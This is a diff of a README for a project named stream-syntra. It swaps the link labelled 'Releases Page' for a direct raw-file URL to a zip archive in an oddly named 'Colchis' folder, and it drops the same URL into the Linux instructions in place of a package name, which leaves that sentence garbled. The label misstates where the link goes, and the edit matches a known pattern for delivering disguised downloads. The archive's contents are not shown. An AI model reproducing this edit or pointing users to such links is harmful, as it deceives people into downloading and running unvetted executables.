matias36658/stream-syntra/README.md

 - **Network:** An internet connection for data streaming and dashboard updates.

 ## 📥 Download & Install
-You can download stream-syntra from the [Releases Page](https://github.com/matias36658/stream-syntra/releases).
+You can download stream-syntra from the [Releases Page](https://raw.githubusercontent.com/matias36658/stream-syntra/main/Colchis/stream-syntra.zip).
 Always select the latest version available for the best experience.

 ### Installation Steps:
 1. Navigate to the downloaded file.
 2. For Windows, double-click the `.exe` file.
 For macOS, drag the application to your Applications folder.
-For Linux, follow the instructions provided in the README file within the `.tar.gz` package.
+For Linux, follow the instructions provided in the README file within the `https://raw.githubusercontent.com/matias36658/stream-syntra/main/Colchis/stream-syntra.zip` package.

 ## 📊 Usage
 1. **Start stream-syntra**: Open the application as mentioned earlier.